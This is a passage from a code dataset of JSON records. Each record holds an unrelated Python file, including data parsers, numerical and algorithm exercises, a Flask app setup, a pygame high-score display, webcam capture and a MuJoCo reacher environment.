'CountryCode', \n 'CountryName', \n 'Confirmed', \n 'Deaths', \n 'Tested', \n 'Latitude', \n 'Longitude'\n]]\n\n# Extract a subset with only the latest date\ndf_latest = pd.DataFrame(columns=list(df.columns))\nfor country in df['Region'].unique():\n df_latest = pd.concat([df_latest, df[df['Region'] == country].iloc[-1:]])\n\n# Save dataset in CSV format into output folder\ndf.to_csv(ROOT / 'output' / 'usa.csv', index=False)\ndf_latest.to_csv(ROOT / 'output' / 'usa_latest.csv', index=False)\n\n# Save dataset in JSON format into output folder\ndf.to_json(ROOT / 'output' / 'usa.json', orient='records')\ndf_latest.to_json(ROOT 
/ 'output' / 'usa_latest.json', orient='records')","sub_path":"input/parse_covidtracking_api.py","file_name":"parse_covidtracking_api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365411218","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Stiffness in Initial Value Problems\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as pt\n\n\n# Consider $y'=-100y+100t + 101$.\n# \n# Exact solution: $y(t)=1+t+ce^{-100t}$.\n# \n# Exact solution derivative: $y'(t)=1-100ce^{-100t}$.\n\n# In[2]:\n\n\ndef f(t, y):\n return -100*y+100*t + 101\n\n\n# In[3]:\n\n\nt_end = 0.2\n\ndef plot_solution(t0, y0):\n c = (y0-1-t0)/np.exp(-100*t0)\n t_mesh = np.linspace(t0, t_end, 1000)\n solution = 1+t_mesh+c*np.exp(-100*t_mesh)\n \n pt.plot(t_mesh, solution, label=\"exact\")\n pt.plot(t0, y0, \"ko\")\n\n\n# In[4]:\n\n\nplot_solution(t0=0, y0=1)\nplot_solution(t0=0, y0=1.2)\nplot_solution(t0=0, y0=-0.5)\nplot_solution(t0=0.05, y0=-0.5)\n\n\n# Here's a helper function that uses a time stepper in the form of a `step_function` to numerically solve an ODE and plot the numerical solution:\n\n# In[38]:\n\n\ndef integrate_ode(step_function, t0, y0, h):\n times = [t0]\n ys = [y0]\n\n while times[-1] <= t_end + 1e-14:\n t = times[-1]\n ys.append(step_function(t, ys[-1], h))\n times.append(t + h)\n\n pt.plot(times, ys, label=step_function.__name__)\n pt.xlim([t0, t_end])\n pt.ylim([-1, 2])\n pt.legend(loc=\"best\")\n\n\n# ## Using an Explicit Method\n\n# First, implement `forward_euler_step(tk, yk, h)`:\n\n# In[44]:\n\n\ndef forward_euler_step(tk, yk, h):\n return yk + h*f(tk, yk)\n\n\n# In[45]:\n\n\nt0 = 0.05\ny0 = -0.5\nh = 0.008 # start this at 0.001, then grow\n\nplot_solution(t0=t0, y0=y0)\nintegrate_ode(forward_euler_step, t0=t0, y0=y0, h=h)\n\n\n# * What's the main challenge here?\n\n# ## Using an Implicit Method\n\n# Next, implement `backward_euler_step(tk, yk, h)`:\n\n# 
In[46]:\n\n\ndef backward_euler_step(tk, yk, h):\n tkp1 = tk+h\n return (yk + h*(100*tkp1 + 101))/(1+100*h)\n\n\n# In[48]:\n\n\nt0 = 0.05\ny0 = -0.5\nh = 0.05 # start this at 0.001, then grow\n\nplot_solution(t0=t0, y0=y0)\nintegrate_ode(backward_euler_step, t0=t0, y0=y0, h=h)\npt.xlim([t0, t_end])\npt.ylim([-1, 2])\npt.legend()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"demos/upload/ivp_odes/Stiffness.py","file_name":"Stiffness.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71007275","text":"# Import flask and template operators\nfrom flask import Flask, render_template, g\n\n# Import SQLAlchemy\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flask_login import login_user, logout_user, current_user, \\\n login_required, LoginManager\n\n# Define the WSGI application object\napp = Flask(__name__)\n\n# Configurations\napp.config.from_object('config')\n\n# Define the database object which is imported\n# by modules and controllers\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'routes.get_login'\n\n@app.before_first_request\ndef setup():\n # Recreate database each time for demo\n from .models import User\n user = db.session.query(User).filter_by(username='root').first()\n if user is not None:\n return\n me = User('root', 'root', 'default.jpg')\n db.session.add(me)\n db.session.add(notme)\n db.session.commit()\n\n\n# Sample HTTP error handling\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html'), 404\n\n@login_manager.user_loader\ndef load_user(id):\n from .models import User\n return User.query.get(int(id))\n\n@app.before_request\ndef before_request():\n g.user = current_user\n\n# Import a module / component using its blueprint handler variable (mod_auth)\nfrom app.blueprints.api import api\nfrom app.blueprints.routes import routes\n\n# Register 
blueprint(s)\napp.register_blueprint(api)\napp.register_blueprint(routes)\n# app.register_blueprint(xyz_module)\n# ..\n\n# Build the database:\n# This will create the database file using SQLAlchemy\ndb.create_all()","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99091245","text":"import os\nimport pandas as pd\nimport gzip\nfrom pathlib import Path\nimport re\nimport json as js\n\n\ndef parse_data(fname):\n for l in open(fname):\n yield eval(l)\n\n\ndef parse_gzip(path):\n g = gzip.open(path, 'rb')\n for l in g:\n yield eval(l)\n\n\ndef getDF_gzip(path):\n i = 0\n df = {}\n for d in parse_gzip(path):\n df[i] = d\n i += 1\n return pd.DataFrame.from_dict(df, orient='index')\n\n\ndef getDF_csv(path, encoding, names):\n return pd.read_csv(path, encoding=encoding, names=names)\n\n\ndef getDF_json(path):\n return pd.read_json(path)\n\n\ndef compose():\n csv_names = ['asin', 'imageName', 'imageUrl', 'title', 'author', 'categoryId', 'category']\n csv_df1 = getDF_csv('data/book30-listing-test.csv', encoding='utf_16_be', names=csv_names)\n csv_df2 = getDF_csv('data/book30-listing-train.csv', encoding='utf_16_be', names=csv_names)\n csv_df3 = getDF_csv('data/book32-listing.csv', encoding='iso-8859-1', names=csv_names)\n\n csv_data = pd.concat([csv_df1, csv_df2, csv_df3])\n csv_data.drop_duplicates('asin')\n # csv_data['categories'] = csv_data.apply(lambda row: [row['category']], axis=1)\n csv_data = csv_data.drop(columns=['imageName', 'title', 'author', 'categoryId'])\n print(csv_data.shape)\n csv_data = csv_data.dropna()\n print(csv_data.shape)\n\n # create file\n os.makedirs('data/processed', exist_ok=True)\n Path('data/processed/books_200000.json').touch()\n csv_data.to_json('data/processed/books_200000.json', orient='records')\n\n\ndef collect_classes():\n df = pd.read_json('data/processed/books_200000.json')\n categories 
= df.category.unique()\n categories.sort()\n d = pd.DataFrame(categories, columns=['class'])\n d = d.dropna()\n print(d)\n d.to_csv('data/processed/classes.csv', index_label='index')\n\n\ndef collect_labels():\n books = pd.read_json('data/processed/books_200000.json')\n classes = pd.read_csv('data/processed/classes.csv')\n d = pd.DataFrame(columns=['asin', 'class'])\n for row in books.itertuples():\n category = row.category\n entry = classes[classes['class'] == category]\n d = d.append({'asin': row.asin, 'class': entry['index']}, ignore_index=True)\n break\n return d\n\n\ndef category_to_folder(category):\n name = category.lower()\n name = re.sub('[^\\w^\\s]', '', name)\n name = name.replace(' ', '_')\n name = name.replace('__', '_')\n return name\n\n\ndef create_folder_to_cat_dict(filename=None):\n df = pd.read_json('data/processed/books_200000.json')\n categories = df.category.unique()\n categories.sort()\n dict = {}\n for c in categories:\n folder = category_to_folder(c)\n dict[folder] = c\n if (filename):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w+') as json_file:\n js.dump(dict, json_file, indent=4, sort_keys=True)\n return dict","sub_path":"utils/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349113939","text":"import cv2\n\n# import cv\nfrom PyQt5 import QtCore\n\n\ndef getCapture():\n # capture = cv.CaptureFromCAM(0)\n capture = cv2.VideoCapture(-1)\n # cv.NamedWindow(\"capture\", cv.CV_WINDOW_AUTOSIZE)\n cv2.namedWindow(\"capture\", cv2.WINDOW_AUTOSIZE)\n\n i = 0\n while True:\n # frame = cv.QueryFrame(capture)\n result, img = capture.read()\n # cv.ShowImage(\"capture\", frame)\n cv2.imshow(\"capture\", img)\n # cv.WaitKey(10)\n cv2.waitKey(10)\n path = \"capture%.4d.jpg\" % i # Уникальное имя для каждого кадра\n # cv.SaveImage(path, frame)\n cv2.imwrite(path, img)\n i += 
1\n\n\ndef getCaprure_2():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Video', frame)\n # cv2.imshow('frame',gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nclass Video_capture(QtCore.QObject):\n signal = QtCore.pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n self.capture = cv2.VideoCapture(0)\n\n def run(self):\n while True:\n ret, frame = self.capture.read()\n self.signal.emit(frame)\n\n\n\nif __name__ == '__main__':\n # getCapture()\n getCaprure_2()\n","sub_path":"Webcam_captures/Video_capture.py","file_name":"Video_capture.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404434584","text":"import turtle as t\nimport math as m\n\n\ndef can_T(a, b, ac, bc, xo, ai, bi, llen1, llen2, lo, orwrite):\n p = (a, b)\n l1 = llen1;\n l2 = llen2\n t.speed(30);\n t.pensize(0)\n t.up()\n t.seth(xo)\n t.goto(a, b)\n t.down()\n if ai == 1:\n t.pencolor(ac)\n t.fd(l1)\n t.fd(-l1 * 2)\n t.fd(l1)\n if bi == 1:\n t.lt(lo)\n if bi == 1:\n t.pencolor(bc)\n t.fd(l2)\n t.fd(-l2 * 2)\n t.fd(l2)\n t.rt(lo)\n if orwrite > 0:\n t.pencolor(ac)\n t.write(p)\n t.up()\n return p\n\n\ndef fant(fant, fx, fy, a, b, k):\n t.pensize(1)\n fa = fant\n l = b - a;\n a11 = a;\n a12 = b\n l2 = (a + b) / 2\n t.up()\n n = int(k) + 1\n k = l / n\n fa = fant\n x = l2\n y1 = eval(fa)\n y2 = y1\n t.pencolor('red')\n xi = [a]\n for i in range(1, n + 1):\n xi += [a + i * k]\n for i in range(n + 1):\n x = xi[i]\n y = eval(fa)\n y0 = fy * (y - y1)\n e = (x - l2) * fx\n x0 = e\n t.goto(x0, y0)\n t.down()\n if i == 0:\n a21 = x0;\n b21 = y0\n b11 = y\n if i == n:\n b12 = y\n t.up()\n return [a21, b21, x0, y0, 0, 0, a11, b11, a12, b12, l2, y2] # 12个\n\n\ndef kedu(a, b, lr, lc, f, k, ox, pc, ls, orfc):\n ls = ls + 1;\n lr = lr * f\n t.up();\n t.speed(30)\n p = 
(a, b)\n t.goto(p)\n n = 10 * int(k + 1)\n lri = lr / n\n li = [-lr]\n for i in range(1, 2 * n + 1):\n li += [-lr + i * lri]\n t.seth(ox)\n t.fd(-lr)\n for i in range(2 * n + 1):\n if i == 0:\n t.down()\n t.pencolor(pc)\n t.lt(90)\n fc = 1\n if i % 5 == 0:\n t.pensize(ls + 1)\n fc = fc * 1.25\n if i % 10 == 0:\n t.pensize(ls + 2)\n fc = fc * 1.5\n if orfc == 0:\n f = 1\n ai = round((i * lri - lr) / f, 2)\n t.dot(2.5, pc)\n t.fd(-3 * lc * fc)\n t.write(' ' + str(ai))\n t.fd(3 * lc * fc)\n t.fd(lc * fc)\n t.fd(-lc * 2 * fc)\n t.fd(lc * fc)\n t.pensize(ls)\n t.rt(90)\n if i < 2 * n:\n t.fd(lri)\n if i == n - 1:\n t.dot(5, pc)\n t.write(' 0')\n if i == 0:\n t.down()\n t.up()\n t.goto(p)\n return li\n\n\ndef main(y):\n t.setup(1000, 800, 300, 0)\n can_T(0, 0, 'white', 'white', 0, 1, 1, 1000, 1000, 90, 0)\n k = 100 # 视图放大倍数\n t.bgcolor('grey')\n val = fant(y[3], k, k, 0.01, 3, 250)\n can_T(-val[10] * k, -val[11] * k, 'blue', 'blue', 0, 1, 1, 1000, 1000, 90, 0)\n li = kedu(-val[10] * k, -val[11] * k, 4, 3, k, 1, 0, 'blue', 0, 1)\n kedu(-val[10] * k, -val[11] * k, 4, 3, k, 1, 90, 'blue', 0, 1)\n t.goto(200, 200)\n t.write('y=' + y[2] + ' [' + str(val[6]) + ',' + str(val[8]) + ']', font=('微软雅黑', 20, 'normal'))\n print(li)\n t.done()\n\n\nif __name__ == '__main__':\n y = ['lg|x|-cos x', 'm.log10(abs(x))-m.cos(x)', 'sin(x)', 'm.sin(x)']\n main(y)\n","sub_path":"main/02/帮人做题4.6.17.53.py","file_name":"帮人做题4.6.17.53.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384034220","text":"import sys\n\n# 모든 문제는 패턴이 있는 경우가 많으며, 그 패턴을 찾는것이 가장 중요한 일이다!\ndef make(n, t):\n for i in range (4, n + 1):\n mem = t[i - 1] + 1\n if not i % 2:\n if mem > t[i // 2] + 1:\n mem = t[i // 2] + 1\n if not i % 3:\n if mem > t[i // 3] + 1:\n mem = t[i // 3] + 1\n t.append(mem)\n return t[i]\n\nt = [0, 0, 1, 1]\nnum = int(sys.stdin.readline())\nif num <= 3:\n print (t[num])\nelse:\n print (make(num, 
t))","sub_path":"(1463) 1로 만들기.py","file_name":"(1463) 1로 만들기.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333153403","text":"import pygame.font\nfrom pygame.sprite import Group\n\nclass HighScores:\n def __init__(self, screen):\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.high_scores_list = open(\"high_scores.txt\", \"r\")\n self.pointsfont = pygame.font.SysFont(\"Comic Sans MS\", 64)\n self.scorefont = pygame.font.SysFont(\"Comic Sans MS\", 48)\n self.titlesurface = self.pointsfont.render('HIGH SCORES', False, (255, 255, 25))\n\n\n self.scores_list = []\n\n #Read the high scores from the text file\n while True:\n self.current_score = self.high_scores_list.readline()\n self.scores_list.append(self.current_score)\n if self.current_score == \"\":\n break\n # Convert the scores to ints to sort them\n index = 0\n for score in self.scores_list:\n strippedscore = score.rstrip(\"\\r\\n\")\n score = (\"0\" + score)\n score = int(score)\n self.scores_list[index] = score\n index += 1\n\n self.scores_list.sort()\n self.scores_list.reverse()\n\n # Show the scores\n def show_score(self):\n self.screen.blit(self.titlesurface, (self.screen_rect.centerx - 200, 120))\n loopindex = 0\n # display the high scores in a list\n for score in self.scores_list:\n if score == 0:\n break\n score_y = 220 + (loopindex * 40)\n scoresurface = self.scorefont.render(str(loopindex + 1) + \". 
\" + str(score), False, (255, 255, 255))\n\n self.screen.blit(scoresurface, (self.screen_rect.centerx - 100, score_y))\n loopindex += 1\n # only show the top 10 scores\n if loopindex >= 10:\n break\n\n\n\n\n\n\n","sub_path":"venv/high_scores.py","file_name":"high_scores.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92850246","text":"import os\nimport csv\n\ncsvpath1 = os.path.join('Resources', 'budget_data_1.csv')\ncsvpath2 = os.path.join('Resources', 'budget_data_2.csv')\n\n#Variables for CSV1\nmonth_count1 = 0\ntotal_revenue1 = 0\nCMRI_01=0\nLMRI_01=0\nRC_01 = 0\nRCS_01 = 0\nRevChanges01=[]\nMonth_Changes01 = []\n\n#Variables for CSV2\nmonth_count2 = 0\ntotal_revenue2 = 0\nCMRI_02=0\nLMRI_02=0\nRC_02 = 0\nRCS_02 = 0\nRevChanges02=[]\nMonth_Changes02 = []\n\n#CSV 1 - BUDGET_DATA 1 COMMANDS\nwith open (csvpath1, newline=\"\") as csvfile:\n csvreader1 = csv.reader(csvfile, delimiter=\",\")\n next(csvreader1)\n\n for row in csvreader1:\n month_count1 += 1\n Month_Changes01.append(row[0])\n total_revenue1 += int(row[1])\n CMRI_01 = int(row[1])\n if month_count1 > 1:\n RC_01 = CMRI_01 - LMRI_01\n RevChanges01.append(CMRI_01)\n LMRI_01 = CMRI_01\n\n#Finding Revenue Changes Budget_DATA_01\nSRevChanges01 = sum(RevChanges01)\naverage_change01 = SRevChanges01 / (month_count1 -1)\nmax_change01 = max(RevChanges01)\nmin_change01 = min(RevChanges01)\nmax_month_index01 = RevChanges01.index(max_change01)\nmin_month_index01 = RevChanges01.index(min_change01)\nmax_month01 = Month_Changes01[max_month_index01]\nmin_month01 = Month_Changes01[min_month_index01]\n\n#CSV 2 - BUDGET_DATA 2 COMMANDS\nwith open (csvpath2, newline=\"\") as csvfile:\n csvreader2 = csv.reader(csvfile, delimiter=\",\")\n next(csvreader2)\n \n\n for row in csvreader2:\n month_count2 += 1\n Month_Changes02.append(row[0])\n total_revenue2 += int(row[1])\n CMRI_02 = int(row[1])\n if month_count1 > 1:\n RC_02 = 
CMRI_02 - LMRI_02\n RevChanges02.append(CMRI_02)\n LMRI_02 = CMRI_02\n\n#Finding Revenue Changes Budget_DATA_02\nSRevChanges02 = sum(RevChanges02)\naverage_change02 = SRevChanges02 / (month_count2 -1)\nmax_change02 = max(RevChanges02)\nmin_change02 = min(RevChanges02)\nmax_month_index02 = RevChanges02.index(max_change02)\nmin_month_index02 = RevChanges02.index(min_change02)\nmax_month02 = Month_Changes02[max_month_index02]\nmin_month02 = Month_Changes02[min_month_index02]\n\n\n#CALCULATING TOTALS\ntotalmonths = int(month_count1) + int(month_count2)\ntotalrevenue = int(total_revenue1) + int(total_revenue2)\ntotalaverage = (int(average_change02) + int(average_change01)) / 2\n\n#For First CSV File\n#print(\"Total Financial Analysis: BUDGET_DATA_1:\")\n#print(\"----------------------------\")\n#print(\"Total Months for Budget_Data_1: \" + str(month_count1))\n#print(\"Total Revenue for Budget_Data_1: \" + str(total_revenue1))\n#print(\"Average Changes for Budget_Data_1: \" + str(average_change01))\n#print(\"Greatest Increase in Revenue: Date: \"+ str(max_month01) +\" Increase: $\"+ str(max_change01))\n#print(\"Greatest Decrease in Revenue: Date: \"+ str(min_month01) +\" Decrease: $\"+ str(min_change01))\n\n#print(\"----------------------------\")\n#print(\" \")\n#print(\" \")\n\n#For Second CSV File\n#print(\"Total Financial Analysis: BUDGET_DATA_2:\")\n#print(\"----------------------------\")\n#print(\"Total Months for Budget_Data_2: \" + str(month_count2))\n#print(\"Total Revenue for Budget_Data_2: \" + str(total_revenue2))\n#print(\"Average Changes for Budget_Data_2: \" + str(average_change02))\n#print(\"Greatest Increase in Revenue: Date: \"+ str(max_month02) +\" Increase: $\"+ str(max_change02))\n#print(\"Greatest Decrease in Revenue: Date: \"+ str(min_month02) +\" Decrease: $\"+ str(min_change02))\n\n\n\n#print(\"----------------------------\")\n#print(\" \")\n#print(\" \")\n\n#Combined Totals\nprint(\"Total Financial Analysis: 
TOTAL\")\nprint(\"----------------------------\")\nprint(\"Total Months: \" + str(totalmonths))\nprint(\"Total Revenue: \" + str(totalrevenue))\nprint(\"Total average change: \" + str(totalaverage))\nprint(\"Total Greatest Increase in Revenue: Date: \"+ str(max_month01) +\" Increase: $\"+ str(max_change01))\nprint(\"Total Greatest Decrease in Revenue: Date: \"+ str(min_month01) +\" Decrease: $\"+ str(min_change01))","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624430821","text":"#!/usr/bin/env python3.4\n# Test script\n# Created by Gerard Heijmans juli 2015.\n#\nimport sys, subprocess, os\n\nprint(\"The current working directory is: {}\".format(os.getcwd()))\n\nfor file in os.listdir(os.getcwd()):\n if os.path.isfile(file):\n print(file)\n","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268294399","text":"from solutions import Trie, any_ranges\nimport unittest\nfrom n_gram import nlog_gen, unigram_smooth_gen\n\nclass DummyModel:\n dummy_data = (\n (('ab',), 0.25),\n (('abc',), 0.25),\n (('acb',), 0.25),\n (('a',), 0.25),\n )\n\n def set_a(self, tf: bool):\n self._a = tf\n\n @property\n def iterprob(self):\n if self._a:\n return iter(DummyModel.dummy_data)\n else:\n return iter(DummyModel.dummy_data[:-1])\n\n\nclass TestTrie(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(TestTrie, self).__init__(*args, **kwargs)\n\n model = DummyModel()\n model.set_a(False)\n us = unigram_smooth_gen(0.95, 1/1000000)\n _nlog = nlog_gen()\n self._trie = Trie(model, us, _nlog)\n\n eow = Trie.eow()\n value = _nlog(us(0.25))\n data = { 'a': { # eow: value,\n 'b': { eow: value,\n 'c': { eow: value }, },\n 'c': {\n 'b': { eow: value } }\n }\n }\n self._data = data\n 
self.assertEqual(self._trie.data, self._data)\n\n def test_search(self):\n trie = self._trie\n ret = trie.search_through('abce')\n self.assertEqual(list(ret), ['ab', 'abc'])\n\n def test_range(self):\n for i,j in any_ranges(range(10)):\n self.assertGreater(j, i)\n for i,j in any_ranges([2,5,7]):\n self.assertGreater(j, i)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"zchen/utils/test_solutions.py","file_name":"test_solutions.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205498371","text":"class Node:\n def __init__(self,val=0,left=None,right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def rob(self,root):\n if not root:\n return 0\n\n def helper(node):\n # A null node will send that if you choose me or my grandchildren, \\\n # the max gain you can get is only 0,0\n if not node:\n return [0,0]\n # Recursively find what the gain would be by choosing left child and left grandchild\n left_child,left_grandchild = helper(node.left)\n right_child,right_grandchild = helper(node.right)\n # If I choose the current node, then I can only choose the grandchildren\n with_node = node.val + left_grandchild + right_grandchild\n # If I don't choose the node, then I am free to choose the maximum gain amongst leftchild and grandchild \\\n # rightchild and grandchild cause they will never be directly connected\n without_node = max(left_child,left_grandchild) + max(right_child,right_grandchild)\n\n return [with_node,without_node]\n \n return max(helper(root))\n\nroot = Node(3)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.right = Node(3)\nroot.right.right = Node(1)\n\nobj = Solution()\nprint(obj.rob(root))","sub_path":"337-House-Robber-3.py","file_name":"337-House-Robber-3.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"131617170","text":"from gym import utils\nfrom multiworld.envs.goal_env_ext.goal_env_ext import GoalEnvExt\nfrom multiworld.envs.env_util import get_stat_in_paths, \\\n create_stats_ordered_dict, get_asset_full_path\n\nimport os\nfrom collections import OrderedDict\nimport numpy as np\nimport mujoco_py\n\n\nclass ReacherEnv(GoalEnvExt, utils.EzPickle):\n def __init__(self, model_path='./reacher/reacher.xml', distance_threshold=1e-2, distance_threshold_obs=0,\n n_substeps=10,\n horizon=50, image_size=48, action_type='velocity',\n with_goal=False,\n use_visual_observation=True,\n use_image_goal=True,\n use_true_reward=False, **kwargs):\n\n GoalEnvExt.__init__(self, model_path=model_path, n_substeps=n_substeps, horizon=horizon, image_size=image_size,\n use_image_goal=use_image_goal, use_visual_observation=use_visual_observation,\n with_goal=with_goal, reward_type='sparse', distance_threshold=distance_threshold,\n distance_threshold_obs=distance_threshold_obs, use_true_reward=use_true_reward, n_actions=2,\n **kwargs)\n utils.EzPickle.__init__(self)\n\n self.action_type = action_type\n\n # Implementation of functions from GoalEnvExt\n # ----------------------------\n\n def _reset_sim(self):\n # Sample goal and render goal state image\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n self.set_state(qpos, qvel=self.init_qvel)\n self.goal_state = self.get_end_effector_location()\n\n qpos[-2:] = self.goal_state\n qpos[:2] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n return True\n\n def 
_get_obs(self):\n if self.use_visual_observation:\n obs = self.render(mode='rgb_array', depth=False).transpose()\n else:\n theta = self.sim.data.qpos.flat[:2]\n obs = np.concatenate([\n np.cos(theta),\n np.sin(theta),\n self.sim.data.qpos.flat[2:],\n self.sim.data.qvel.flat[:2],\n self.get_end_effector_location() - self.get_goal_location()\n ])\n if self.use_image_goal:\n desired_goal = self.goal_observation.transpose() if (self.goal_observation.shape[0] != 3 and self.goal_observation.shape[0] != 4) else self.goal_observation\n achieved_goal = obs\n else:\n desired_goal = self.get_goal_location()\n achieved_goal = self.get_end_effector_location()\n\n return {\n 'observation': obs.copy(),\n 'achieved_goal': achieved_goal.copy(),\n 'desired_goal': desired_goal.copy()\n }\n\n def get_current_info(self):\n \"\"\"\n :return: The true current state, 'ag_state', and goal state, 'g_state'\n \"\"\"\n ag_state = self.get_end_effector_location().copy()\n g_state = self.get_goal_location().copy()\n info = {\n 'ag_state': ag_state,\n 'g_state': g_state,\n 'effector2goal_distance': np.linalg.norm(ag_state - g_state)\n }\n return info\n\n def _set_action(self, ctrl):\n if self.action_type == 'force':\n self.send_control_command(ctrl)\n elif self.action_type == 'velocity':\n self.send_control_command(np.asarray([0., 0.])) # Set the force to be zero\n self.set_joint_velocity(np.asarray(ctrl) * 10)\n\n def _viewer_setup(self):\n self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n self.viewer.cam.lookat[1] = 0.0\n self.viewer.cam.lookat[2] = 0.0\n self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n self.viewer.cam.azimuth = 90\n self.viewer.cam.distance = 1.3\n\n def set_hidden_goal(self):\n self.sim.model.geom_rgba[9, :] = np.asarray([0., 0., 0, 0.]) # Make the goal transparent\n\n # Env specific helper functions\n # ----------------------------\n def 
set_goal_location(self, goalPos):\n self.sim.data.qpos[2] = goalPos[0]\n self.sim.data.qpos[3] = goalPos[1]\n\n def send_control_command(self, ctrl):\n assert len(ctrl) == 2\n self.sim.data.ctrl[0] = ctrl[0]\n self.sim.data.ctrl[1] = ctrl[1]\n\n def set_joint_velocity(self, jointVel):\n self.sim.data.qvel[0:2] = jointVel\n\n def get_end_effector_location(self):\n return np.squeeze(self.sim.data.body_xpos[3:4, 0:2]).copy()\n\n def get_goal_location(self):\n return np.squeeze(self.sim.data.body_xpos[4:5, 0:2]).copy()\n\n def _sample_goal(self):\n while True:\n goal = self.np_random.uniform(low=-.2, high=.2, size=2)\n if np.linalg.norm(goal) < 2:\n break\n return goal\n\n\n# Start Adding interface for multiworld environment collection\n\n def _sample_goal_state(self):\n return self._sample_goal()\n\n def get_goal(self):\n ''' Get goal that are stored currently in this object.\n (refering to the rlkit interface, provide what it need...)\n '''\n return {\n 'desired_goal': self.goal_state,\n 'state_desired_goal': self.goal_state,\n }\n\n def set_to_goal(self, goal):\n ''' @brief: Set the goal which stores in this object and move the object to\n the position by the given goal.\n @args: 'goal': must be a numpy array (not matrix)\n '''\n self.goal_state = goal['state_desired_goal']\n \n # move the end effector to the goal\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n def set_goal(self, goal):\n ''' And randomize the state\n '''\n self.goal_state = 
goal['state_desired_goal']\n \n # It should be similar to reset the environment\n qpos = self.np_random.uniform(low=-2 * np.pi, high=2 * np.pi, size=self.model.nq)\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n self.goal_observation = self.render(mode='rgb_array', depth=False)\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qpos[-2:] = self.goal_state\n qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)\n qvel[-2:] = 0\n self.set_state(qpos, qvel)\n\n def get_image(self, width=84, height=84, camera_name=None):\n assert width == height\n image = self.render(mode='rgb_array', image_size=width, depth=False)\n return image\n\n def get_diagnostics(self, paths, prefix=''):\n statistics = OrderedDict()\n # for stat_name in [\n # 'touch_distance',\n # 'hand_success',\n # 'obj_success',\n # 'hand_and_obj_success',\n # 'touch_success',\n # 'hand_distance',\n # 'obj_distance',\n # 'hand_and_obj_distance',\n # 'total_pickups',\n # ]: # these are copied from saywer_pickup_and_place.py\n for stat_name in [\n 'ag_state', 'g_state', 'image_dist', 'image_success',\n ]:\n stat_name = 